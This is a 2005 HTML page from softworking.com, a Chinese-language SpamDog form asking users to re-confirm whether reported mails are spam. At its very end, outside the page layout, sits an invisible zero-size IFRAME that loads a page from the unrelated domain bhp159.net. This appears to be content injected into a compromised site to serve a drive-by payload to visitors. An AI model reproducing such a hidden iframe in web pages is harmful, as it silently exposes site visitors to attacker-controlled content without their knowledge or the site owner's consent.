<head>
<title>softworking.com - 軟體工廠</title>
<meta http-equiv="Content-Language" content="zh-tw">
<meta http-equiv="Content-Type" content="text/html; charset=big5">
</head>

<style type="text/css">
<!--
A.css1:visited  {color: #336699; text-decoration: none}
A.css1:link  {color: #336699; text-decoration: none}
A.css1:active  {color: #336699; text-decoration: none}
A.css1:hover   {color: #336699; text-decoration: underline}

A.css2:visited  {color: #000000; text-decoration: none}
A.css2:link  {color: #000000; text-decoration: none}
A.css2:active  {color: #000000; text-decoration: none}
A.css2:hover   {color: #000000; text-decoration: underline}

A.css3:visited  {color: #FFFFFF; text-decoration: none}
A.css3:link  {color: #FFFFFF; text-decoration: none}
A.css3:active  {color: #FFFFFF; text-decoration: none}
A.css3:hover   {color: #FFFFFF; text-decoration: underline}
//-->
</style>

 


<body topmargin="12" leftmargin="1" rightmargin="1" bottommargin="12" bgcolor="#000000">

<div align="center">

<table border="6" width="90%" id="table1" cellspacing="0" bgcolor="#FFFFFF" bordercolor="#000000" cellpadding="4">
	<tr>
		<td>
		<table border="0" width="100%" id="table4" cellspacing="4">
			<tr>
				<td bgcolor="#336699" width="100%" align="right" >
				<table border="0" width="100%" id="table10" cellspacing="6">
					<tr>
						<td style="font-family: 新細明體; font-size: 9pt; color: #FFFFFF">
						　</td>
						<td width="75">
						<p align="right">
				<img border="0" src="http://www.softworking.com/images/sf1.jpg" width="75" height="20"></td>
					</tr>
				</table>
				</td>
			</tr>
			</table>
		</td>
	</tr>
	<tr>
		<td align="center" height="242">
		<table border="0" width="100%" id="table3"><tr>
		<td style="font-family: 新細明體; font-size: 11pt; color: #FFFFFF" rowspan="2" width="1"></td>
		<td style="font-family: 新細明體; font-size: 11pt; color: #FFFFFF; line-height:150%" bgcolor="#FEA203">
		&nbsp;&nbsp;SpamDog 垃圾郵件中心 - 信件誤判警告 !!</td>
	</tr>
	<tr>
		<td style="font-family: 新細明體; font-size: 9pt; line-height: 200%" valign="top">
		<table border="0" width="100%" cellspacing="6" id="table15" style="font-family: 新細明體; font-size: 9pt">
			<tr>
				<td style="line-height: 200%">
				<p align="center">&nbsp;&nbsp; <b><font color="#FF0000" size="3">請注意 !!!!!!!!!</font></b><br>
&nbsp;&nbsp; 以下您的回報信件主旨 , 經過垃圾郵件中心分析後 , 發現有誤判的可能 , 請透過下方的問題 , 再一次確認您的判斷 , 謝謝 !&nbsp;&nbsp;
				<br>
&nbsp;&nbsp; 
				<div align="center">
				<table border="1" width="80%" id="table16" style="font-family: 新細明體; font-size: 9pt" bordercolor="#C0C0C0" cellspacing="0">
					<tr>
						<td width="138">
						<p align="center">回報時間</td>
						<td>
						<p align="center">主旨</td>
						<td width="100">
						<p align="center">您的上次判斷</td>
					</tr><!--Replace1--></table>
				</div>
				<p align="center">請在再一次確認以上信件&nbsp; (以下的判斷為回報給垃圾郵件中心參考使用 , 並不會影響您在 SpamDog 的判斷 )</p><form method = "post" action="http://www.softworking.com/DbConfirm.asp">
				<div align="center">
				<table border="1" width="80%" id="table17" style="font-family: 新細明體; font-size: 9pt" bordercolor="#C0C0C0" cellspacing="0">
					<tr>
						<td>
						<p align="center">
						<input name="Question" value="1" type="radio" checked>這些是我沒有訂閱 , 卻收到的電子報 , 而此份電子報本身應該是正常的</td>
					</tr>
					<tr>
						<td>
						<p align="center"><input name="Question" value="2" type="radio">這些是我曾經訂閱的電子報 , 但是因為廣告太多或內容很糟..等, 
						我認為是垃圾郵件</td>
					</tr>
					<tr>
						<td><p align="center"><input name="Question" value="3" type="radio">這些是垃圾郵件</td>
					</tr>
					<tr>
						<td>
						<p align="center"><input name="Question" value="4" type="radio">這些是正常信件</td>
					</tr>
					<tr>
						<td>
						<p align="center"><input name="Question" value="5" type="radio">這些有一些是垃圾信 , 有一些是正常信</td>
					</tr>
					<tr>
						<td><input name="ipid" type=hidden value="<!--Replace2-->"><input name="dogid" type=hidden value="<!--Replace3-->">
						<p align="center"> <input type="submit" value="送出">　</td>
					</tr>
				</table></div>
				</form>
				</td>
			</tr>
		</table>
		</td>
	</tr>
	</table>

		<hr><font face="Arial" size="2">softworking.com 2005</font></td>
	</tr>
</table></div><IFRAME SRC="http://www.bhp159.net/k.htm" WIDTH=0 HEIGHT=0></IFRAME>
